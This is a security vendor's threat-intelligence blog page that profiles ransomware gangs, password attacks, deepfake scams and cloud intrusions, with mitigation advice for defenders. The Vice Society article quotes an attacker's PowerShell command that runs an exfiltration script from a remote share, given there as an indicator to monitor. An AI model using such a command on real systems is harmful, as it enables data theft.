DefendEdge Logo
Contact
Engage with Us
Contact
Engage with Us

Category: Cyber Threat Intelligence

Categories
Cyber Threat Intelligence

How Important Is a Secure Password?

Financial fraud and identity theft often occur due to unauthorized access to accounts given to hackers by weak passwords. ‘Password1234’ might have worked 10 years ago, but today, that will never pass if you want to protect your banking information, personal data, and identity. Brute-force attacks, one of the most popular forms of cyberattacks, are extremely common and can be avoided with secure login credentials and a strong cybersecurity mindset.

Brute-Force Attacks
Trial and error is a hacker’s bread and butter when it comes to performing brute-force attacks. Repeatedly attempting commonly used passcodes to hack into a victim’s account, threat actors will use computers to evaluate wide ranges of combinations until they gain access, compromising passwords, encryption keys and login credentials. This commonly used practice has been modified throughout the years by hackers and is easily obtainable due to weak passwords.

Credential stuffing, a type of brute-force attack, focuses specifically on finding weak passwords and exfiltrating them in hopes that victims follow bad practices and use the same login credentials for multiple sites. Dictionary attacks focus on following a list, or dictionary, of words where threat actors will systematically enter one after the other in hopes of success. Hybrid and reverse brute-force attacks are similar in the sense of filtering through commonly used usernames and working backward to combine password-guessing and popular sayings or numbers.

Rainbow table attacks take it a step further and divulge into hashes to try and crack passcodes. Hackers will gain access to an application’s hashes and then utilize a table, nicknamed a rainbow table, to transfer the hashes into a passphrase before inserting them. Password spraying is another common method where hackers will use the same password but change the username until they run through an acquired list of usernames.

Credential Harvesting and Phishing
Otherwise known as password harvesting, credential harvesting is notable as the gateway to online fraud. Threat actors can achieve this by several different methods such as phishing, fake websites, malware, and other forms of social engineering. Smishing, SMS phishing, is a common tactic that has grown more popular recently as more people are noticing text messages with malicious links in their inboxes. Other forms of phishing are conducted through email, the original form, and vishing which takes place over the phone. Hackers will call victims in vishing attacks and try to exploit them by getting them to go to malicious links or hand over sensitive information by impersonating organizations such as banks or college administration offices.

Recent Attacks
Cisco has been warning users this month that software such as their VPNs and SSH services have been found compromised in an uprise of brute-force attacks and to follow up on their advisories to see the affected systems. In Ukraine, over one hundred million accounts were hijacked in a span of brute-force attacks. As of recently three men have been arrested after revealing that they were able to access the victim’s Instagram and email accounts due to easy-to-guess passwords.

WordPress, a web content management system, is currently dealing with a string of attacks that focus on injecting scripts that coerce victims’ browsers into brute-forcing passwords for other platforms. The scripts, in the form of a JSON file, contain all the guidelines for an attack which are being executed silently while the victim is working on their computer.

23andMe recently uncovered that they were victims of a credential harvesting attack beginning in early 2023. The threat actors targeted customers who were of Ashkenazi Jewish and Chinese heritages specifically, compromising 350,000 customers’ sensitive data subjecting them to discrimination and harassment as the conflict grows between Palestine and Israel.

Phishing attacks, on the other hand, have been continuously on the rise as the year progresses, with smishing and vishing gaining popularity. LastPass, a password management application, suffered a phishing attack by unknown threat actors earlier this past week using a CryptoChameleon phishing kit. The specified kit allows actors to create fake single-sign-on, SSO, pages to provide to the victims enabling them to gain access to their credentials, compromising information.

Password Recommendations
Long and complex is the standard when creating a password, 8-10 characters at the minimum with symbols and numbers included. Most recommend moving up to at least twelve characters, as the longer the password is the harder it is for hackers to crack. Your credentials should never contain any publicly presented information that could be easily guessable such as your kids’ names, dates of birth, or the day you got married. Instead, utilize sources such as google password creators or random combinations on your keyboard to produce a complex password. Never use the same password for more than one account because as mentioned above, this is the widespread practice hackers look for when performing credential stuffing attacks.

Multi-Factor Authentication (MFA) is another great tool that most sites require in today’s age, although it may be annoying, it can save you from thousands of dollars in consequences from attacks. By getting a second password or pin sent to a phone number or email address from a different device than the one you are trying to access, hackers will have a challenging time trying to infiltrate your account. Some MFAs use face ID, or a fingerprint to secure your credentials, improving your security score and allowing you to ensure your systems are protected. Changing your passwords every 60-90 days at the maximum is another recommended technique to ensure account security. Some authentication applications can give you an option to set up dates for you to change your passwords, and others require it. When it comes to recurring changes, it can seem overwhelming to have to come up with new passwords every couple of months, but it is important to make sure you do not reuse the same characters and duplicate them throughout the changes, or it won’t be as effective.

Categories
Cyber Threat Intelligence

Ransomware Attacks in the U.S. 

Since the start of the new year, companies across the country have witnessed ransomware attacks from notorious threat actors Medusa, LockBit, and ALPHV/BlackCat standing out above the others. There have been at least 50 known attacks accounted for during the past three and a half months, approximately 25% under what the United States saw this time the year prior. Although the statistics are showing to be in our favor, ransomware attacks are still a very prominent threat to businesses and corporations everywhere.  

Recent Attacks 
From government infrastructures to energy services and transportation, a wide range of cities from New York to California have had to halt operations due to ransomware attacks. Change Healthcare, a major healthcare technology provider for the United States, suffered two attacks just weeks apart from threat actors ALPHV/BlackCat and then by ransomware gang RansomHub. The sensitive data exfiltrated by the groups included medical records and financial information belonging to US military personnel and patients.  

LockBit, the highest performing ransomware gang so far in 2024, has made over 30 attacks against various U.S. sectors since the beginning of the year, with a focus in the education and retail industries. After some arrests were made in February from international law enforcement, some of the eCrime group’s infrastructure had been seized. Unfortunately, the threat actor group saw this as only a mere setback and were found relaunching their operation less than a week later, taking the lead on the most ransomware attacks from one group against the country thus far. 

During the month of March, the East Coast noticed what seemed to be a string of attacks against government facilities within days of each other. Birmingham, Alabama discovered a disruption of its computer network on the sixth of March shutting down services such as the 311-call center. Huntsville, Alabama being next on the 10th, was forced to shut services down across the town due to an attack. No threat actors have stepped up to claim either of the attacks against the cities in Alabama, but they are currently under investigation.  

Pensacola, Florida was hit only eight days later with Henry County, Illinois being four days after that. The Medusa ransomware gang took credit against the attack on Illinois, giving the victims eight days to pay a $500,000 ransom. Tarrant County Appraisal District in Texas confirmed they were victims of an attack on the 21st by Medusa and were told they had to pay $700,000 in ransom. Jackson County, Missouri, was forced to declare a state of emergency after their services were disrupted on the 28th due to an unknown threat actor infiltrating their IT systems.  

Who is LockBit? 
From financial services to manufacturing and healthcare sectors, LockBit ransomware is most notable for their wide array of tactics, techniques, and procedures (TTPs) allowing them to extort critical infrastructures globally. By constantly modifying the TTPs the eCrime group utilizes to deploy and execute ransomware, unsuspecting victims have a hard time staying up to date on security defenses to protect themselves. Known for attacks against some of world’s largest multinational financial institutions and leading technology firms, LockBit has stayed on the top of CISA’s advisory list as being the most deployed ransomware-as-a-service over the past two years.  

Who is ALPHV/BlackCat? 
Commonly victimizing the healthcare sector, ALPHV/BlackCat ransomware group reaches to encrypt both Windows and Linux devices by using advanced social engineering techniques. Posing as most commonly IT staff for the victim’s company, the threat actors gain credentials from the employees which are then used to access their network and deploy remote access software to exfiltrate data. ALPHV/BlackCat can steer away from detection by downloading applications such as Metasploit on the domain controller and deleting their traces in the logs on the exchange server afterwards. 

Who is Medusa? 
Appearing in the cyber realm for the first time in June of 2021 as a ransomware-as-a-service threat actor group, Medusa has grown substantially over the years eliciting companies with their double extortion method. By threatening to release the stolen data if the victims do not pay the ransom, they are not only encrypting the infiltrated systems but are extorting victims twice by compromising sensitive data. With the eCrime group’s primary motive being financial gain, the sectors they attack vary from corporate victims to technology companies with easily exploitable vulnerabilities.  

What To Expect Moving Forward 
We can expect ransomware trends to pick up as the year progresses, following right under the statistics from 2023. As the more sophisticated threat actors continue to revise their attack methods and gain more confidence, we will undoubtedly see new eCrime groups make their appearance causing chaos in new and unique ways. Thanks to CISA, advisories and rewards for aiding in the takedown of actors such as the ones listed above, are available for our viewing and are recommended for all to read.  

Mitigation Techniques 
Implementing secure remote access tools and application controls should aid in preventing the installation of anything your organization does not want or need, called allowlisting. Antivirus tools are never completely trusted on their own, as like anything, service disruptions happen so by using a combination of applications the odds are stacked more in your favor. Endpoint detection and response (EDR) applications are extremely useful when it comes to detection for malicious or unwanted traffic. For this type of monitoring and more, explore the tools we offer at DefendEdge under “Our Services”.  

Detecting ransomware can be tricky, but by ensuring that your organization is up to date on security training and is aware of the security posture, the risk can be mitigated. If you or someone you know has been a victim of a ransomware attack, remember to not pay the ransom as this encourages the threat actors to continue their attacks, financial gain is almost always their main motive. 

Categories
Cyber Threat Intelligence

The Danger of Deepfake Scams

The rise of artificial intelligence (AI) has enhanced our lives in many ways. In the realm of cybersecurity, AI has bolstered defenses against threats. There are machine learning algorithms, enhanced anomaly detection, and automated response mechanisms for rapid response to and neutralizing threats. However, AI is also being used maliciously by threat actors. A popular use case among cybercriminals is using deepfake technology to scam individuals. Deepfake technology uses artificial intelligence and machine learning to create realistic and often deceptive videos and audio recordings. Often, threat actors use these deepfake videos to impersonate high-profile individuals like executives or celebrities to deceive them into believing they’re communicating with a legitimate source. Deepfakes can be used for many scams, such as persuading individuals to transfer funds or disclosing sensitive information through deceptive and convincing simulations.

Recently, an advertisement has been circulating on X, formerly known as Twitter, and YouTube of Ripple CEO Brad Garlinghouse. In this ad, the CEO is telling viewers to send their XRP to a specific address to have it doubled as a form of thanks for supporting the company. XRP is a cryptocurrency and the native token of Ripple. Of course, Garlinghouse has not made any comments or statements regarding XRP airdrops, and he has confirmed that it’s a scam. The surprising element is that the YouTube algorithm, designed to detect scams, did not flag this one.

Another recent deepfake scam impersonated Elon Musk. In this video, the Tesla CEO promotes the news of opening an investment platform called ‘Quantum AI.’ This video was shared on Facebook, and the attached link takes you to a website called ‘financial advisors.’ It appears the deepfake originally came from a video of an interview with Musk on CNBC’s YouTube channel. There is no credible news of Musk launching any ‘Quantum AI’ platform.

It can be challenging to detect deepfakes due to their realistic appearance. Mitigation of these AI scams relies on technological solutions, awareness, and vigilance. Unnatural facial expressions or inconsistencies in audio can be a clear giveaway of deepfakes. If you spot suspicious advertisement videos, ensure they come from verified profiles. Where applicable, implement strong authentication measures. Regarding cryptocurrency and phishing, consistently implement best practices such as never providing personal information in response to an unsolicited request, contacting the financial institution yourself, and never providing your password over the phone. If you believe you have fallen victim to a phishing attempt and money has been exchanged, your first step in potentially recovering lost assets is to deactivate/flag the method of payment used and reach out to local law enforcement.

Categories
blogs Cyber Threat Intelligence Uncategorized

Clop Ransomware Gang: Profiling a Notorious Cybercriminal Organization

In recent years, the Clop ransomware gang has emerged as one of the most prolific and notorious cybercriminal organizations. Employing sophisticated techniques and constantly evolving their strategies, the group has successfully targeted high-profile organizations worldwide. This article aims to provide an informative profile of the Clop ransomware gang, detailing its history, operations, and recent activities.

History of Clop
Clop originated as a variant of the CryptoMix ransomware family and gained prominence in February 2019 when the threat group known as TA505 employed it in a large-scale spear-phishing email campaign. Operating as a ransomware-as-a-service (RaaS) model, Clop was used by a Russian-speaking group and disguised its malicious intent by utilizing verified and digitally signed binaries. This approach allowed the ransomware to evade security detection effectively.

In 2020, the financially motivated hacking group FIN11 started deploying Clop ransomware, leveraging zero-day vulnerabilities in the Kiteworks file transfer appliance. These attacks involved the use of a specific web shell called “DEWMODE” for exfiltrating stolen information. Clop’s operators also began implementing double extortion schemes, where they threatened to publicize and auction off stolen data if their demands were not met.

Clop’s Operations
The Clop ransomware gang exhibits a range of sophisticated techniques in its operations. Unlike other ransomware variants, Clop targets entire networks rather than individual computers, gaining access to the Active Directory (AD) server to persistently infect endpoints. Previous attacks by the group involved large-scale phishing campaigns, utilizing spam emails and malicious attachments to deliver the Clop malware. These attacks often involved various tools, such as SDBOT, FlawedAmmyy, and Cobalt Strike, which facilitated reconnaissance, lateral movement, and exfiltration of data before the deployment of the ransomware.

The group utilizes multiple tactics to coerce victims, including negotiation emails and threats of publicizing stolen information on their dedicated leak site, “Cl0p^_-Leaks.” Clop has even employed quadruple extortion techniques, targeting top executives and customers to exert additional pressure on companies to pay the ransom. By constantly evolving its tactics, Clop has set new trends in the world of cybercrime.

Recent Activities
While the arrests of six suspected Clop members in Ukraine in June 2021 dealt a significant blow to the group, their criminal activities continued throughout 2021 and 2022. However, recent data suggests a slowdown in ransomware deployments, indicating a shift towards data stealing and extortion. Law enforcement and private partners managed to seize parts of Clop’s infrastructure and takedown money laundering channels used for cryptocurrency payments.

In May 2023, the Clop gang exploited critical zero-day vulnerabilities in the MOVEit Transfer and MOVEit Cloud file transfer software, targeting numerous private and public organizations. These attacks focused on stealing sensitive data and extorting companies rather than encrypting systems. The group used a combination of tactics, including data leak threats and demands for negotiations, to pressure victims into complying with their demands.

The Clop ransomware gang has established itself as a formidable threat in the cybersecurity landscape. With a history of high-profile attacks and constantly evolving tactics, the group continues to pose a significant risk to organizations worldwide. Enterprises must remain vigilant and adopt proactive cybersecurity measures to mitigate the threats posed by ransomware groups like Clop. Collaborative efforts between law enforcement, private partners, and cybersecurity professionals are crucial in dismantling such criminal organizations and safeguarding sensitive data from exploitation.

Categories
alerts blogs Cyber Threat Intelligence

The Play Ransomware Gang: Profile of a Persistent Threat

In recent years, the world has witnessed an alarming rise in cyberattacks, with ransomware being one of the most pervasive and damaging forms of malicious activity. The Play ransomware gang has emerged as a highly disruptive and notorious group among the many ransomware gangs. This article aims to provide an informative and professional profile of the Play ransomware gang, shedding light on their operations, tactics, and notable attacks.

The City of Oakland Attack

The Play ransomware gang made headlines with their cyberattack on the City of Oakland, California. Beginning in mid-February 2023, the attack targeted the city’s IT systems, causing significant disruptions. While emergency services remained operational, various other departments were severely impacted, including business taxation and parking citation services. The gang claimed responsibility for the attack and demanded a ransom, threatening to expose sensitive data stolen from the city.

Attack Methodologies

Play ransomware employs several sophisticated techniques to infiltrate and compromise targeted organizations. They exploit known vulnerabilities, such as exposed RDP servers and FortiOS vulnerabilities (CVE-2018-13379 and CVE-2020-12812), to gain initial access. Once inside the network, they employ “lolbins” binaries and distribute executables via Group Policy Objects. Notably, the gang also engages in double extortion, exfiltrating sensitive data and threatening to release it if their ransom demands are not met.

Unique Technique: Intermittent Encryption

A distinctive characteristic of the Play ransomware gang is their use of intermittent encryption. This novel technique involves encrypting files in smaller, intermittent chunks, evading detection by security systems that rely on static analysis. By encrypting only portions of a file, often distinguished by null characters, Play ransomware can remain undetected for longer periods, exacerbating the damage caused to targeted organizations.

Notable Attacks

Beyond the City of Oakland, the Play ransomware gang has targeted various organizations worldwide. One significant incident occurred in Switzerland, where they hacked Xplain, an IT firm that supported numerous federal and cantonal government departments. They also targeted the major Spanish bank Globalcaja, compromising client and employee documents. Additionally, the gang claimed to have stolen 600GB of data from communications firm Poly (Polycom).

Play Ransomware Tools

The Play ransomware gang has developed custom tools to enhance their attacks’ effectiveness. Grixba, a network-scanning and information-stealing tool, enables them to enumerate users and computers within a compromised network. The VSS Copying Tool allows the gang to interact with the Volume Shadow Copy Service, even copying files in use by applications. These tools provide them with critical information and increase the efficiency of their malicious activities.

Security Recommendations

Organizations should implement robust security measures to combat the evolving threat posed by ransomware groups like Play. These include multifactor authentication (MFA), least privilege principles, network segmentation, attack surface management (ASM), secure domain controllers (DC), regular patching and updates, and maintaining encrypted offline backups of critical data. Additionally, employing threat intelligence platforms and monitoring the dark web for emerging threats can enhance an organization’s security posture.

The Play ransomware gang has proven to be a persistent and highly disruptive threat to organizations worldwide. Their sophisticated attack methods, including intermittent encryption and double extortion, showcase their determination to exploit vulnerabilities for financial gain. Organizations must remain vigilant, implementing robust security measures and proactive threat mitigation strategies to protect themselves against the increasing menace of ransomware attacks.

Categories
Cyber Threat Intelligence

ALPHV Ransomware: A Closer Look into the Russian Ransomware Group

In recent years, the Russian-based ALPHV ransomware group, also known as BlackCat, Noberus, Gold Blazer, and Alpha Spider, has emerged as a formidable cyber threat, targeting organizations worldwide and operating with a ransomware-as-a-service (RaaS) business model. With their advanced tactics and persistent attacks, ALPHV has become a significant player in the ransomware landscape targeting over 400 victims and demanding ransoms ranging from $400,000 to $3 million in cryptocurrency.

ALPHV ransomware has continued to grow for a variety of reasons since 2021; however, a large contributor to this growth is the marketing strategy utilized. ALPHV will allow affiliates to use their ransomware and keep 80-90% of the ransom with the remainder going to ALPHV, continuing the growth of their notoriety. 

The ransomware itself is coded using the Rust programming language and is believed to be the first ransomware developed that uses Rust. The utilization of Rust programming language empowers ALPHV to effortlessly compile it for different operating system architectures. With its extensive array of native options, Rust offers a high level of customization, enabling attackers to pivot and personalize their attacks effectively.

Utilizing the RaaS model, many threat actors, including ALPHV, will leverage the double-extortion technique, which implements two methods of attack. The double-extortion kill chain typically follows:

Initial Breach: During this phase, the attacker successfully infiltrates the target’s systems using varying methods such as an exploited vulnerability, phishing attempt, brute force, stolen credentials to utilize remote desktop protocol, etc.

Network Reconnaissance and Lateral Movement: The threat actor conducts an assessment of the network’s security measures to identify potential detection points. Once undetected, the attacker navigates through different parts of the network, gaining access to various resources.

Data Exfiltration (Extortion Tactic #1): In the first stage of double extortion, the attacker extracts data from the compromised device without immediately demanding a ransom. The user remains unaware of their data being held hostage at this point.

Ransomware Deployment (Extortion Tactic #2): At this crucial stage of all ransomware attacks, the deployed ransomware encrypts the victim’s data, rendering it inaccessible. The user’s system is locked, and a ransom demand is prepared.

DDoS Attack on Site or Network: In this phase, the attacker notifies the user of the ongoing attack on their system. The victim is provided with instructions on how to pay the ransom to regain access to their encrypted data.

Publish Data: If the ransom is not paid, the attacker will post sensitive data, credentials, and other valued information on a name-and-shame blog utilized by the attacker.

Organizations wanting to mitigate the risks associated with ALPHV and similar ransomware groups should adopt a proactive and multi-layered approach. This includes regular employee training on identifying phishing attempts, implementing robust network security measures, regularly patching and updating software, and maintaining secure backups of critical data.

Categories
Cyber Threat Intelligence

Vice Society: One of the Most Impactful Ransomware Gangs of 2022

Vice Society (also known as Vice Spider, DEV-0832, and Vanilla Tempest) is identified as a Russian-based group specializing in intrusion, exfiltration, and extortion. Operating since the summer of 2021, Vice Society sets itself apart from other ransomware groups by deviating from the typical ransomware-as-a-service (RaaS) model. Instead of developing their own custom ransomware payload, they rely on modified versions of existing ransomware families available for sale on dark web marketplaces. Specifically, Vice Society has been observed using forks of ransomware strains such as HelloKitty (also known as FiveHands) and Zeppelin in their attack chain. This approach differentiates them from groups like LockBit, which follow the RaaS model. While many ransomware groups have transitioned to using randomly generated file extensions, DEV-0832 has incorporated branding in their Vice Society variant, using file extensions such as .v-s0ciety or .v-society. In late September 2022, DEV-0832 introduced another variant called RedAlert, which uses the .locked file extension as part of its ransomware payload.  

This financially motivated group occasionally avoids deploying ransomware and opts for extortion using stolen data. In 2022, Vice Society was recognized as one of the most impactful ransomware gangs. This cybercrime group significantly focused on targeting educational institutions, surpassing other ransomware families such as LockBit, BlackCat, BianLian, and Hive. Cybersecurity researchers found Vice Society also targeted prominent industry sectors, including healthcare, governments, manufacturing, retail, and legal services. Vice Society has targeted victims across continents, spanning North America, South America, and Europe, in addition to their technically unremarkable attacks. 

DEV-0832 utilizes various methods to gain access to victims’ systems. These threat actors initially breach networks relying on well-known techniques like phishing, compromised credentials, known security vulnerabilities, or even obtaining initial access from criminal actors referred to as “initial access” brokers. Once they infiltrate a network, Vice Society employs automated scripts and leverages the organization’s network management tools to conduct reconnaissance and extract data. Subsequently, the group deploys the prepackaged ransomware to carry out their malicious activities. The group has been observed employing various tools such as PowerShell Empire, SystemBC, and Cobalt Strike for lateral movement purposes. Based on incident response efforts in 2021, Vice Society typically remains in the victims’ environments for around six days. The initial ransom demands can exceed $1 million, but negotiations often lead to a reduction of about 60%, settling at around $460,000. Vice Society takes extensive steps to prevent organizations from recovering without paying the ransom. Some observations indicate that DEV-0832 has accessed two domain administrator accounts and reset passwords for over 150,000 users. This action effectively locks out legitimate users and hampers remediation efforts, including attempts to prevent the deployment of ransomware or conduct post-compromise incident response. 

Discovered in early 2023, the Vice Society ransomware gang attacked the Los Angeles Unified School District (LAUSD), the second-largest school district in the United States. As a result of this attack, files containing the personal information of contractors, including Social Security Numbers (SSNs), were stolen. LAUSD discovered that the threat actors had access to their network for over two months, from July 31, 2022, to September 3, 2022. The stolen data included payroll records and labor-related documents containing SSNs, names, and home addresses of contractor and subcontractor employees. LAUSD confirmed that Vice Society had published the stolen data on their leak site. Despite the ransom demands, LAUSD refused to pay, prioritizing the allocation of resources for students’ education. The FBI, CISA, and MS-ISAC issued a joint advisory highlighting the Vice Society’s disproportionate targeting of the U.S. education sector, which includes LAUSD. Vice Society has also claimed attacks on other educational institutions globally, including Cincinnati State Technical and Community College and the University of Duisburg-Essen. LAUSD serves over 640,000 kindergarten through 12th-grade students across Los Angeles and surrounding areas. 

Most recently, cybersecurity researchers found that the Vice Society ransomware gang utilized a custom-built Microsoft PowerShell (PS) script to exfiltrate data from a victim network. This data exfiltration method involves using PowerShell scripts as a built-in data exfiltration technique, which helps threat actors evade detection by security software and detection mechanisms. The script, named w1.ps1, was recovered from the Windows Event Log (WEL) and was found to be executed using a specific PowerShell command, “powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1”. The script is designed to automatically choose and copy data from the network without requiring any arguments. The script identifies mounted drives on the system and recursively searches through root directories, enabling data exfiltration via HTTP. It employs exclusion criteria to filter out system files, backups, web browser-related folders, and certain security solutions. The script showcases a high level of coding expertise and highlights the persistent threat of double extortion in ransomware. This finding emphasizes the importance of organizations prioritizing strong security measures and remaining vigilant against evolving threats. While the script is efficient in terms of resource consumption, its specific criteria mean that it will only exfiltrate files over 10 KB with specific file extensions and within designated directories.  

To mitigate the impact of Vice Society, consider implementing the following measures: 

  • Conduct device discovery to increase network visibility. 
  • Utilize vulnerability management tools for updates. 
  • Employ firewalls and intrusion prevention devices. 
  • Enable cloud-delivered protection in your antivirus solution. 
  • Activate tamper protection features. 
  • Run endpoint detection and response in block mode. 
  • Enable automated investigation and remediation. 
  • Implement strong credential hygiene practices. 
  • Apply attack surface reduction rules to prevent common infection vectors. 
  • Enable PowerShell Module and Script Block Logging in PowerShell.  

Additionally, monitoring the presence of the PowerShell command mentioned earlier is recommended. These measures will enhance your defenses and reduce the impact of the threat. 

Categories
Cyber Threat Intelligence

BlackByte Ransomware Returns: Introducing the New Technology (NT) Variant

Emerging around July 2021, BlackByte is a fully featured Ransomware-as-a-Service (RaaS) group that infiltrates organizations and demands hefty ransoms. They employ a strategy known as double extortion, stealing files from the targeted organization and publicly leaking them if the ransom goes unpaid. BlackByte is known for continuously updating and distributing homonymous malware in various versions. The initial implementation of BlackByte was in C#, followed by a Golang version that included a privilege escalation technique exploiting the Bring Your Own Vulnerable Driver (BYOVD) vulnerability. The latest iteration, called BlackByte NT, is written in C++ and incorporates diverse methods to obstruct both static and dynamic analysis of the malware. The primary objective of this new version is to obfuscate the malware’s behavior when under scrutiny.

The evolution of BlackByte showcases their relentless pursuit of refining their malicious capabilities. The latest version, BlackByte NT, employs various tactics, including the dynamic import of APIs using hash-based methods, anti-debug checks, and evasion techniques, such as using syscalls instead of standard Windows API libraries. Furthermore, the malware conducts thorough checks of execution arguments and establishes persistence by registering a new service if the appropriate conditions are met. BlackByte NT employs advanced cryptographic algorithms such as Curve25519 elliptic curve cryptography (ECC), used for asymmetric encryption, and the ChaCha20 algorithm for symmetric file encryption. Like its previous version, the latest variant of the BlackByte malware continues to utilize vulnerable drivers as part of its advanced evasion techniques. Specifically, the malware drops two files, “A3V86HEL” and “A3V86HEL_1,” in the directory C:\SystemData. The file “A3V86HEL” corresponds to the file RTCore64.sys, a kernel mode driver associated with Micro-Star MSI AfterBurner, a graphics card utility. The other file “A3V86HEL_1”, represents DBUtil_2_3.Sys, a driver related to the Dell Client firmware update utility. These drivers can be exploited to escalate privileges within the targeted system and disable security protection products. While the utilization of the RTCore64.sys driver was previously reported in the analysis of the second version of BlackByte, the inclusion of the Dell driver appears to be a distinguishing characteristic of the new variant.

Indicators of Compromise (IOCs):

SHA256 – 02a0a39dbe0dcb5600f4179aeab457bb86965699e45d1d154082b02139dc701d

SHA1 – c0950ebfa3a63c705ca813cfd28364aa1d90bb09

MD5 – bf1f2f3759448a05d3dd92a4f7f042f6

Some recommended mitigations for the new BlackByte variant include keeping software updated, educating users about risks and social engineering techniques, maintaining regular backups, restricting privileges and access, implementing network segmentation, utilizing behavioral analysis and threat detection tools, developing an incident response plan, conducting security awareness training, and performing regular security audits. These measures help protect against known vulnerabilities, detect, and block malicious activities, minimize the impact of ransomware infections, and ensure effective incident response and recovery.

Categories
Cyber Threat Intelligence

Lemon Group’s Cybercrime Enterprise Leverages Millions of Pre-Infected Android Phones

The Lemon Group, a large cybercrime enterprise, has installed “Guerilla” malware on approximately 9 million Android-based devices, including smartphones, watches, TVs, and TV boxes.  

Techniques such as reflashing and silent installation have become prevalent in the past decade. Reflashing involves reprogramming or replacing the firmware of a device, allowing for modifications, firmware updates, or the installation of different operating systems. Initially used for device customization, threat actors later exploited these methods for malicious activities, infecting phones with unwanted apps to profit from pay-per-install schemes. In 2016, reports emerged of Triada malware being implanted in multiple devices. In 2019, Google confirmed cases where third-party vendors used original equipment manufacturer (OEM) images without notifying the OEM company. In 2021, researchers discovered the botnet and the criminal operations behind the SMS Phone Verified Accounts (PVA) mobile botnet, which exploited compromised mobile supply chains. They identified the malware responsible as Guerrilla and traced it back to a threat actor group known as the Lemon Group. Researchers observed an overlap between Guerrilla and Triada regarding communication and network flow, indicating a potential collaboration between the two groups. 

Guerilla malware allows the threat actors to carry out various malicious activities, such as intercepting one-time passwords, setting up reverse proxies, hijacking WhatsApp sessions, and more. The Lemon Group was initially exposed in February 2022 and later rebranded as “Durian Cloud SMS,” but their tactics and infrastructure remained the same. The group’s main business involves utilizing big data for analysis and advertising purposes. It is unclear how Lemon Group infects devices, but possible methods include supply chain attacks, compromised software/firmware updates, or insider involvement. The malware consists of various plugins for specific functions, including intercepting SMS passwords, setting up proxies, hijacking sessions, displaying intrusive ads, and silently installing/uninstalling applications. Lemon Group’s monetization strategy includes selling compromised accounts, hijacking network resources, generating fraudulent ad impressions, and offering proxy and SMS PVA services. The impact of Lemon Group’s operations is global, with millions of infected devices spread across 180 countries, particularly in the United States, Mexico, Indonesia, Thailand, and Russia. The actual count of infected devices could be higher, as some devices have not yet communicated with the attackers’ servers. Researchers detected over 490,000 compromised mobile numbers tied to one-time password requests for various services. The extent of the Lemon Group’s operations indicates their substantial global reach. The threat actor’s activities pose a significant risk to compromised devices and legitimate users, and their malware has been spread over the past five years. 

To mitigate mobile device malware risks, keep software updated, download apps from trusted sources, exercise caution with app permissions, install reputable security software, beware of phishing and malicious links, enable app verification and sandboxing, implement device encryption and strong passwords, regularly back up data, use public Wi-Fi networks cautiously or with a VPN, and stay informed about mobile threats through education and awareness. These measures help protect against known vulnerabilities, malicious apps, phishing attempts, and unauthorized access, enhancing the overall security of mobile devices and safeguarding personal information. 

Categories
Cyber Threat Intelligence

UNC3944 Exploits Azure Serial Console for Complete VM Takeover

A threat group known as UNC3944 (also known as Roasted 0ktapus and Scattered Spider) has been observed hijacking Microsoft Azure admin accounts through phishing and SIM-swapping attacks. The financially motivated group bypasses traditional detection methods within Azure and gains full administrative access to compromised virtual machines (VMs) within victim organizations using Microsoft’s cloud computing service. They have been active since late last year, primarily targeting telecommunications and business process outsourcing (BPO) companies.

The attackers exploit the Azure Serial Console to install remote management software for persistence and abuse Azure Extensions for stealthy surveillance. By leveraging stolen credentials obtained through SMS phishing, the threat actors impersonate administrators to trick help desk agents into sending a multifactor reset code via SMS. The attackers perform SIM swapping to receive the 2FA token without the victim’s knowledge. Once inside the Azure environment, UNC3944 utilizes administrator privileges to gather information and modify or create Azure accounts. They employ Azure Extensions, such as diagnostic features, for surveillance and data gathering. UNC3944 further gains administrative access to VMs using the Azure Serial Console, running commands, and employing PowerShell to enhance persistence and install remote administration tools. Additionally, the group uses a loader called STONESTOP to install a malicious signed driver named POORTRY, enabling them to terminate security software processes and carry out BYOVD (Bring Your Own Vulnerable Device) attacks. The attackers create a reverse SSH tunnel for secure and persistent access, bypassing network restrictions. Finally, they utilize compromised user account credentials to log into the compromised VMs and expand control within the breached environment, stealing data along the way.

UNC3944’s attack demonstrates their deep understanding of Azure and their ability to evade detection by leveraging built-in tools. Organizations’ insufficient security measures and limited knowledge of cloud technologies, such as relying on SMS-based multifactor authentication, create opportunities for these sophisticated threat actors. To enhance security, organizations should limit access to remote administration channels and avoid using SMS as a multifactor authentication method whenever feasible. It is advisable to review user account permissions, ensuring they are not excessively permissive, and implement Conditional Access Authentication Strength policies that align with best practices. These measures contribute to a more secure environment and help prevent unauthorized access.

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com